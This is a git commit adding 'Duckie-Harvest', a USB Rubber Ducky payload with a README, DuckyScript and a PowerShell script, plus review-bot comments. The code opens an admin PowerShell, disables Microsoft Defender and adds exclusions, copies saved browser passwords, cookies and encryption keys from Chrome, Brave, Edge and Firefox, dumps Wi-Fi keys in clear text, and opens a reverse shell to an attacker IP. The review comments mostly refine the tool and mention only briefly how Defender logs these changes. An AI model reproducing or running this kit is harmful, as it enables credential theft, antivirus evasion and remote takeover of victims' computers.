commit
3b30121b9e
|
@ -0,0 +1,41 @@
|
|||
# Duckie-Harvest
|
||||
## Overview
|
||||
|
||||
This script is designed for penetration testing purposes and offers the following functionalities:
|
||||
|
||||
- **Dump Wi-Fi Passwords**: Extracts and saves all Wi-Fi passwords stored on the target machine.
|
||||
- **Dump Browser Credentials**: Extracts saved credentials from Google Chrome, Brave, Firefox, and Microsoft Edge.
|
||||
- **System Information**: Collects and dumps comprehensive system information, including network configurations and active processes.
|
||||
- **Network Configuration**: Gathers detailed network configuration data and performs a network scan.
|
||||
- **Reverse Shell**: Initiates a reverse shell to provide remote command-line access (requires configuration of the attacker IP and attacker port).
|
||||
|
||||
This payload is intended for use with a USB Rubber Ducky device.
|
||||
|
||||
## Usage
|
||||
|
||||
### Prerequisites
|
||||
|
||||
- **USB Rubber Ducky**: Ensure you have a USB Rubber Ducky device.
|
||||
- **Powershell**: The target machine must have Powershell installed.
|
||||
|
||||
### Configuration
|
||||
|
||||
1. **Configure drive name**:
|
||||
edit the powershell script to set the name of your drive
|
||||
|
||||
```powershell
|
||||
$DRIVE = 'DUCKY'
|
||||
2. **Configure Attacker IP and Port**:
|
||||
Edit the powershell script to set your attacker's IP address and port for the reverse shell connection:
|
||||
|
||||
```powershell
|
||||
$IP = 'YOUR_IP'
|
||||
$PORT = 'YOUR_PORT'
|
||||
|
||||
3. **Configure drive and powershell script name **:
|
||||
edit the payload.txt to set both the name of the drive label and the powershell script
|
||||
|
||||
```Duckyscript
|
||||
DEFINE #DUCKY_DRIVER_LABEL DUCKY
|
||||
DEFINE #PS1 sy_cred.ps1
|
||||
|
|
@ -0,0 +1,72 @@
|
|||
ATTACKMODE HID STORAGE
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DEFINE #DUCKY_DRIVER_LABEL DUCKY
|
||||
DEFINE #PS1 sy_cred.ps1
|
||||
|
||||
IF ($_OS == WINDOWS )THEN
|
||||
|
||||
DELAY 200
|
||||
REM -----open Powershell as Admin
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 400
|
||||
LEFT
|
||||
DELAY 150
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRINGLN_POWERSHELL
|
||||
|
||||
$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File #PS1" -WindowStyle Hidden
|
||||
exit
|
||||
|
||||
END_STRINGLN
|
||||
|
||||
|
||||
|
||||
END_IF
|
|
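Review bot: The typed `Set-MpPreference -DisableRealtimeMonitoring $true` line in the `STRINGLN_POWERSHELL` block has no matching restore in this payload, so Microsoft Defender real-time protection stays off if the second stage never runs to its last statement (for example when no volume with the configured label is found). The PowerShell script in this commit shares the defect: its only restore is the final `Set-MpPreference -DisableRealtimeMonitoring $false`, and the `ExclusionPath` and `ExclusionExtension` entries it adds are never removed, so a tested host is left weakened after the drive is unplugged. Put the restore in a `finally` block in the script together with `Remove-MpPreference -ExclusionPath "${duckletter}\"` and `Remove-MpPreference -ExclusionExtension "ps1"`. On the defensive side, these changes are recorded as Defender events 5001 and 5007 in the Windows Defender operational log, and Tamper Protection prevents the real-time-monitoring change from taking effect.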
@ -0,0 +1,140 @@
|
|||
|
||||
|
||||
#-- Payload configuration --#
|
||||
|
||||
$DRIVE = 'DUCKY' # Drive letter of the USB Rubber Ducky
|
||||
$IP = 'YOUR_IP' # IP address of the attacker machine
|
||||
$PORT = 'YOUR_PORT' # Port to use for the reverse shell
|
||||
|
||||
|
||||
# Set destination directory
|
||||
|
||||
|
||||
|
||||
$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq $DRIVE }).DeviceID
|
||||
Set-Location $duckletter
|
||||
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
Add-MpPreference -ExclusionPath "${duckletter}\"
|
||||
Set-MpPreference -ExclusionExtension "ps1"
|
||||
|
||||
$destDir = "$duckletter\$env:USERNAME"
|
||||
if (-Not (Test-Path $destDir)) {
|
||||
New-Item -ItemType Directory -Path $destDir
|
||||
}
|
||||
|
||||
# Function to copy browser files
|
||||
function CopyBrowserFiles($browserName, $browserDir, $filesToCopy) {
|
||||
$browserDestDir = Join-Path -Path $destDir -ChildPath $browserName
|
||||
if (-Not (Test-Path $browserDestDir)) {
|
||||
New-Item -ItemType Directory -Path $browserDestDir
|
||||
}
|
||||
|
||||
foreach ($file in $filesToCopy) {
|
||||
$source = Join-Path -Path $browserDir -ChildPath $file
|
||||
if (Test-Path $source) {
|
||||
Copy-Item -Path $source -Destination $browserDestDir
|
||||
Write-Host "$browserName - File copiato: $file"
|
||||
} else {
|
||||
Write-Host "$browserName - File non trovato: $file"
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
# Configuration for Google Chrome
|
||||
$chromeDir = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default"
|
||||
$chromeFilesToCopy = @("Login Data")
|
||||
CopyBrowserFiles "Chrome" $chromeDir $chromeFilesToCopy
|
||||
Copy-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Chrome") -ErrorAction SilentlyContinue
|
||||
|
||||
# Configuration for Brave
|
||||
$braveDir = "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default"
|
||||
$braveFilesToCopy = @("Login Data")
|
||||
CopyBrowserFiles "Brave" $braveDir $braveFilesToCopy
|
||||
Copy-Item -Path "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Brave") -ErrorAction SilentlyContinue
|
||||
|
||||
# Configuration for Firefox
|
||||
$firefoxProfileDir = Join-Path -Path $env:APPDATA -ChildPath "Mozilla\Firefox\Profiles"
|
||||
$firefoxProfile = Get-ChildItem -Path $firefoxProfileDir -Filter "*.default-release" | Select-Object -First 1
|
||||
if ($firefoxProfile) {
|
||||
$firefoxDir = $firefoxProfile.FullName
|
||||
$firefoxFilesToCopy = @("logins.json", "key4.db", "cookies.sqlite", "webappsstore.sqlite", "places.sqlite")
|
||||
CopyBrowserFiles "Firefox" $firefoxDir $firefoxFilesToCopy
|
||||
} else {
|
||||
Write-Host "Firefox - Nessun profilo trovato."
|
||||
}
|
||||
|
||||
# Configuration for Microsoft Edge
|
||||
$edgeDir = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"
|
||||
$edgeFilesToCopy = @("Login Data")
|
||||
CopyBrowserFiles "Edge" $edgeDir $edgeFilesToCopy
|
||||
Copy-Item -Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Edge") -ErrorAction SilentlyContinue
|
||||
|
||||
# Gather additional system information
|
||||
function GatherSystemInfo {
|
||||
$sysInfoDir = "$duckletter\$env:USERNAME\SystemInfo"
|
||||
if (-Not (Test-Path $sysInfoDir)) {
|
||||
New-Item -ItemType Directory -Path $sysInfoDir
|
||||
}
|
||||
|
||||
Get-ComputerInfo | Out-File -FilePath "$sysInfoDir\computer_info.txt"
|
||||
Get-Process | Out-File -FilePath "$sysInfoDir\process_list.txt"
|
||||
Get-Service | Out-File -FilePath "$sysInfoDir\service_list.txt"
|
||||
Get-NetIPAddress | Out-File -FilePath "$sysInfoDir\network_config.txt"
|
||||
}
|
||||
|
||||
GatherSystemInfo
|
||||
|
||||
# Network scanning
|
||||
|
||||
|
||||
# Retrieve Wi-Fi passwords
|
||||
function GetWifiPasswords {
|
||||
$wifiProfiles = netsh wlan show profiles | Select-String "\s:\s(.*)$" | ForEach-Object { $_.Matches[0].Groups[1].Value }
|
||||
|
||||
$results = @()
|
||||
|
||||
foreach ($profile in $wifiProfiles) {
|
||||
$profileDetails = netsh wlan show profile name="$profile" key=clear
|
||||
$keyContent = ($profileDetails | Select-String "Key Content\s+:\s+(.*)$").Matches.Groups[1].Value
|
||||
$results += [PSCustomObject]@{
|
||||
ProfileName = $profile
|
||||
KeyContent = $keyContent
|
||||
}
|
||||
}
|
||||
|
||||
$results | Format-Table -AutoSize
|
||||
|
||||
# Save results to a file
|
||||
$results | Out-File -FilePath "$duckletter\$env:USERNAME\WiFi_Details.txt"
|
||||
}
|
||||
|
||||
GetWifiPasswords
|
||||
|
||||
# Reverse shell
|
||||
function ReverseShell {
|
||||
param(
|
||||
[string]$ip,
|
||||
[int]$port
|
||||
)
|
||||
|
||||
$client = New-Object System.Net.Sockets.TCPClient($ip, $port)
|
||||
$stream = $client.GetStream()
|
||||
[byte[]]$bytes = 0..65535 | ForEach-Object {0}
|
||||
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
|
||||
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
|
||||
$sendback = (Invoke-Expression $data 2>&1 | Out-String)
|
||||
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
|
||||
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
|
||||
$stream.Write($sendbyte, 0, $sendbyte.Length)
|
||||
$stream.Flush()
|
||||
}
|
||||
$client.Close()
|
||||
}
|
||||
|
||||
ReverseShell -ip $IP -port $PORT
|
||||
|
||||
# Re-enable Windows Defender real-time monitoring
|
||||
Set-MpPreference -DisableRealtimeMonitoring $false
|
||||
|
||||
exit
|
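Review bot: `Set-MpPreference -ExclusionExtension "ps1"` replaces the host's existing extension exclusions instead of appending to them, so the machine's prior Defender configuration is lost and nothing later in the script can put it back. Save the current list first with `$prevExt = (Get-MpPreference).ExclusionExtension` and write it back during cleanup, so the host ends the run with the configuration it started with. Two comments also need correcting: `$DRIVE` holds a volume label, not a drive letter, because it is compared with `VolumeName`, so the comment should read `# Volume label of the USB Rubber Ducky`. The `# Network scanning` heading has no code under it although the README lists a network scan.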